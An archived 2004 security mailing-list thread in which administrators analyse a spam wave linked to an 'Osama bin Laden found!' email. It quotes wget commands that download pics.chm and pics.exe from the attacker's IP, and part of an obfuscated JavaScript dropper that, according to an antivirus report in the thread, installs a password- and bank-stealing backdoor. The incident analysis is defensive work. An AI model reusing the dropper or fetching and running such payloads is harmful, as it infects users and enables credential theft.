Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Massive increase in spam volume?

From: "Don Wilder" <don () thewilders org>
Date: Mon, 26 Apr 2004 10:33:22 -0400
This is actually an exploit and was discussed last week on the Dshield email list. I am copying the findings here for your information. 

-Don
---------- cut from Dshield ------------------
From: "Blanchard, Joe" <BLANCHAJ () bsci com> Sender: <list-bounces () lists dshield org> Subject: RE: [Dshield] Osama email Date: Fri, 23 Apr 2004 14:05:26 -0400 To: "'General DShield Discussion List'" <list () lists dshield org> Not sure this is the same as noted on this article. 
I'm seeing the following when hitting that link
html off of pics attempts to DL pics.chm, which in turn (I believe) DLs and runs pics.exe. Oddly, while I've not enough time to fully investigate this, it overwrites my wmplayer.exe resulting in a change in size to 11k from 72k. Variant maybe? 
Cheers
-Joe

Follows is wgets of the item(s)
[root@ jgb]# wget http://220.95.231.54/pics
--13:59:16-- http://220.95.231.54/pics
           => `pics'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 302 Object Moved
Location: http://220.95.231.54/pics/ [following]
--13:59:17-- http://220.95.231.54/pics/
           => `index.html'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,113 [text/html]
100%[====================================>] 4,113 17.54K/s ETA 
00:00

13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113]

[root@ jgb]# more index.html
<script>
<!--
function S(){var s=location.href.substr(7);return
s.substr(0,s.indexOf('/'));}
function T(){return 'l';}
function U(){return 'C';}
function V(){return 'm';}
function W(){return '.';}
function X(){return 'E';}
function Y(){return 'i';}
function Z(){return 'x';}
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+
"%
3"+U
()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()
+"
%3"+
==========intentional left out full source [root@jgb]# wget http://220.95.231.54/pics.chm 
--14:00:56-- http://220.95.231.54/pics.chm
           => `pics.chm'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,268 [application/octet-stream]
100%[====================================>] 11,268 23.72K/s ETA 
00:00

14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268]
[root@jgb]# wget http://220.95.231.54/pics.exe
--14:03:11-- http://220.95.231.54/pics.exe
           => `pics.exe'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,752 [application/octet-stream]
100%[====================================>] 10,752 21.65K/s ETA 
00:00

14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]





----------
From:
list-bounces () lists dshield org[SMTP:list-bounces () lists dshield org] on
behalf of Deb Hale[SMTP:haled () pionet net]
Sent: Friday, April 23, 2004 12:40 PM
To: 'General DShield Discussion List'
Subject: [Dshield] Osama email
FYI , 
I just received notification from my AV that the file that Bjorn

Stromberg

emailed had the Exploit-MhtRedir.gen virus. It appears that is what they
are
calling this particular email. Symantec calls it Backdoor.Nibu.D and

says
that it attempts to steal passwords and bank account information. 
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.ht

ml

Deb



_______________________________________________
list mailing list
list () lists dshield org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

----------------------------------------------

On Sun, 25 Apr 2004 23:00:05 -0700 (PDT)
 "Jay D. Dyson" <jdyson () treachery net> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sat, 24 Apr 2004, Thamer Al-Harbash wrote:
I work at a large ISP in Canada and just a few hours ago we've experienced a massive increase in spam volume. The volume is so high 
it's bordering on being a denial of service attack.
Does anyone know if there's a worm out in the wild currently doing this? I've confirmed with some of my collegues that other ISPs are also 
experiencing this.
I'm interested in finding specific netblocks but the spam seems to be 
coming from everywhere.
I'd say you're seeing the first wave of what appears to be a new worm. Earlier this evening I received about 20 copies of the same message (same subject, same body, different senders) which was titled, "Osama bin Laden found!" and listed a URL (http://220.95.231.54/pics/).
Being naturally curious (and even more naturally paranoid), I went to the URL...but not with my browser. What I snagged was an obfuscated Javascript page which -- from what I could decipher at a glance -- was some kind of spam pitch for cheap prescription drugs. I didn't bother 
looking for a malicious payload after that.
So what we have here could be a worm that spews spam. This sort of thing will pretty much render the idea of blackholing netblocks useless 
now, since unpatched Windows system are everywhere.
That's my take. I look forward to hearing about what others have 
seen land in their inboxes.

- -Jay
( ( _______ )) )) .--"There's always time for a good cup of coffee."--. >====<--. C|~~|C|~~| )>------ Jay D. Dyson - jdyson () treachery net ------<( | = |-' `--' `--' `-If you wanna make God laugh, tell him your plans.-' `------' 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (TreacherOS)
Comment: See http://www.treachery.net/~jdyson/ for current keys. 

iD8DBQFAjKVp6uxsHJ5aYG4RAsRGAJ484Fe0Rp1i+d/yt3yAnDPPRoSvwACcC8I0
aSmguv2f7zEF4hky8xDx6D4=
=ZZ/E
-----END PGP SIGNATURE-----

---------------------------------------------------------------------------
----------------------------------------------------------------------------




---------------------------------------------------------------------------
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: